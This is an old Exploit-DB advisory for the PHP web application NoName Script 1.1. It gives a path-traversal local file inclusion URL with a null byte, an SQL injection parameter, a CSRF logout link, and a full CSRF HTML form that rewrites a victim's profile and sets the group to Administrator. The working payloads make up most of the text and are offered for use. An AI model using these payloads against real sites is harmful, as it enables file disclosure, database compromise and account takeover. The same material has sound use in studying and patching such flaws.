noname script <= 1.1 - Multiple Vulnerabilities

2008-08-23T00:00:00
ID EDB-ID:6291
Type exploitdb
Reporter SirGod
Modified 2008-08-23T00:00:00

Description

NoName Script <= 1.1 Multiple Remote Vulnerabilities. Webapps exploit for php platform

                                        
                                            ################################################################################
[+] NoName Script 1.1 BETA Multiple Remote Vulnerabilities  
[+] Discovered By SirGod                         
[+] www.mortal-team.org                         
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz
#################################################################################

[+] Local File Inclusion

     http://localhost/index.php?action=../../../autoexec.bat%00&kategorie=Tutorial
     
    This will open autoexec.bat .

[+] SQL Injection   

     http://localhost/index.php?action=newsadmindel&file_id=[SQL]
     
[+] Cross Site Request Forgery     

     If an logged in user with administrative permisions will click the following link ,he will be logged out.

     http://localhost/logout.php

[+] Cross Site Request Forgery - Change User Profile

    If an logged in user with administrative permisions will click the following link the following action will be executed.

    What to change :
   
    - form action and profil_id : &lt;form action="http://localhost/index.php?action=editsettings&profil_id=67" method="post" ....etc &gt;
       action : change http://localhost with the website link.
       profil_id : id of the user that you want to change settings for it
    - input value : &lt;td&gt;&lt;input name="edit_benutzername" disabled="disabled" value="Sirgod" type="text"&gt;&lt;/td&gt;
       value : your name (corresponding to ID)
      
    And now edit the other settings change via web browser.After that,use this CSRF wisely.

[+] Here is the HTML code :   

&lt;form action="http://localhost/index.php?action=editsettings&profil_id=67" method="post" name="editsettings" id="editsettings"&gt;
        &lt;input name="sent" value="1" type="hidden"&gt;

    &lt;center&gt;&lt;table border="0" cellpadding="3" cellspacing="0"&gt;
        &lt;tbody&gt;&lt;tr&gt;
            &lt;td colspan="2" style="font-weight: bold;"&gt;
                Benutzerinformationen
            &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Benutzername:&nbsp;&lt;/td&gt;
            &lt;td&gt;&lt;input name="edit_benutzername" disabled="disabled" value="Sirgod" type="text"&gt;&lt;/td&gt;

        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Benutzergruppe:&nbsp;&lt;/td&gt;
            &lt;td&gt;
                                &lt;select name="edit_benutzergruppe" size="1"&gt;
                                                &lt;option value="0"&gt;User&lt;/option&gt;
                            &lt;option value="1"&gt;Premium Member&lt;/option&gt;

                            &lt;option value="2"&gt;Deleter&lt;/option&gt;
                            &lt;option value="3"&gt;Moderator&lt;/option&gt;
                            &lt;option value="4" selected="selected"&gt;Administrator&lt;/option&gt;
                                            &lt;/select&gt;
            &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td colspan="2"&gt;&lt;hr&gt;&lt;/td&gt;

        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td colspan="2" style="font-weight: bold;"&gt;
                Zusätzliche Informationen
            &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Geschlecht:&nbsp;&lt;/td&gt;
            &lt;td&gt;

                &lt;select name="edit_geschlecht" size="1"&gt;
                                                &lt;option value=""&gt;keine Angabe&lt;/option&gt;
                            &lt;option value="m" selected="selected"&gt;männlich&lt;/option&gt;
                            &lt;option value="w"&gt;weiblich&lt;/option&gt;
                                            &lt;/select&gt;
            &lt;/td&gt;
        &lt;/tr&gt;

        &lt;tr&gt;
            &lt;td&gt;Geburtstag:&nbsp;&lt;/td&gt;
            &lt;td&gt;
                &lt;select name="edit_gb_tag" size="1"&gt;
                    &lt;option value=""&gt;&nbsp;&lt;/option&gt;
                    &lt;option value="1"&gt;1&lt;/option&gt;&lt;option value="2"&gt;2&lt;/option&gt;&lt;option value="3"

selected="selected"&gt;3&lt;/option&gt;&lt;option value="4"&gt;4&lt;/option&gt;&lt;option value="5"&gt;5&lt;/option&gt;&lt;option

value="6"&gt;6&lt;/option&gt;&lt;option value="7"&gt;7&lt;/option&gt;&lt;option value="8"&gt;8&lt;/option&gt;&lt;option value="9"&gt;9&lt;/option&gt;&lt;option

value="10"&gt;10&lt;/option&gt;&lt;option value="11"&gt;11&lt;/option&gt;&lt;option value="12"&gt;12&lt;/option&gt;&lt;option

value="13"&gt;13&lt;/option&gt;&lt;option value="14"&gt;14&lt;/option&gt;&lt;option value="15"&gt;15&lt;/option&gt;&lt;option

value="16"&gt;16&lt;/option&gt;&lt;option value="17"&gt;17&lt;/option&gt;&lt;option value="18"&gt;18&lt;/option&gt;&lt;option

value="19"&gt;19&lt;/option&gt;&lt;option value="20"&gt;20&lt;/option&gt;&lt;option value="21"&gt;21&lt;/option&gt;&lt;option

value="22"&gt;22&lt;/option&gt;&lt;option value="23"&gt;23&lt;/option&gt;&lt;option value="24"&gt;24&lt;/option&gt;&lt;option

value="25"&gt;25&lt;/option&gt;&lt;option value="26"&gt;26&lt;/option&gt;&lt;option value="27"&gt;27&lt;/option&gt;&lt;option

value="28"&gt;28&lt;/option&gt;&lt;option value="29"&gt;29&lt;/option&gt;&lt;option value="30"&gt;30&lt;/option&gt;&lt;option value="31"&gt;31&lt;/option&gt;          

     &lt;/select&gt;

                &lt;select name="edit_gb_monat" size="1"&gt;
                    &lt;option value=""&gt;&nbsp;&lt;/option&gt;
                    &lt;option value="1"&gt;Januar&lt;/option&gt;&lt;option value="2"&gt;Februar&lt;/option&gt;&lt;option value="3"&gt;März&lt;/option&gt;&lt;option

value="4"&gt;April&lt;/option&gt;&lt;option value="5"&gt;Mai&lt;/option&gt;&lt;option value="6"&gt;Juni&lt;/option&gt;&lt;option

value="7"&gt;Juli&lt;/option&gt;&lt;option value="8"&gt;August&lt;/option&gt;&lt;option value="9"&gt;September&lt;/option&gt;&lt;option

value="10"&gt;Oktober&lt;/option&gt;&lt;option value="11" selected="selected"&gt;November&lt;/option&gt;&lt;option

value="12"&gt;Dezember&lt;/option&gt;                &lt;/select&gt;

                &lt;input name="edit_gb_jahr" style="width: 45px;" maxlength="4" value="1991" type="text"&gt;
            &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td valign="top"&gt;Benutzertext:&nbsp;&lt;/td&gt;
            &lt;td&gt;&lt;textarea name="edit_beschreibung" style="width: 270px; height: 90px;"&gt;Was geht aaaab xD&lt;/textarea&gt;
        &lt;/td&gt;&lt;/tr&gt;
        &lt;tr&gt;

            &lt;td&gt;Homepage:&nbsp;&lt;/td&gt;
            &lt;td&gt;&lt;input name="edit_homepage" value="http://paddys.tk" type="text"&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td colspan="2"&gt;&lt;hr&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td colspan="2" style="font-weight: bold;"&gt;

                Instant Messaging
            &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;ICQ-Nummer:&nbsp;&lt;/td&gt;
            &lt;td&gt;&lt;input name="edit_icq" value="" type="text"&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;MSN-Name:&nbsp;&lt;/td&gt;

            &lt;td&gt;&lt;input name="edit_msn" value="" type="text"&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;AIM-Name:&nbsp;&lt;/td&gt;
            &lt;td&gt;&lt;input name="edit_yahoo" value="" type="text"&gt;&lt;/td&gt;
        &lt;/tr&gt;
                &lt;tr&gt;
            &lt;td colspan="2"&gt;&lt;hr&gt;&lt;/td&gt;

        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td colspan="2" style="font-weight: bold;"&gt;
                Verwarnungen
            &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&nbsp;&lt;/td&gt;
            &lt;td&gt;

            Admin wurde noch nicht verwarnt.            &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Aktion:&nbsp;&lt;/td&gt;
            &lt;td&gt;
                &lt;a href="#" onclick="HelpPopup('verwarn.php?profil_id=24');"&gt;Verwarnungen verwalten&lt;/a&gt;
            &lt;/td&gt;

        &lt;/tr&gt;
                &lt;tr&gt;
            &lt;td colspan="2"&gt;&nbsp;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&nbsp;&lt;/td&gt;
            &lt;td&gt;&lt;input name="submit" value="Speichern" type="submit"&gt;&lt;/td&gt;
        &lt;/tr&gt;

    &lt;/tbody&gt;&lt;/table&gt;&lt;/center&gt;
    &lt;/form&gt;

#################################################################################

# milw0rm.com [2008-08-23]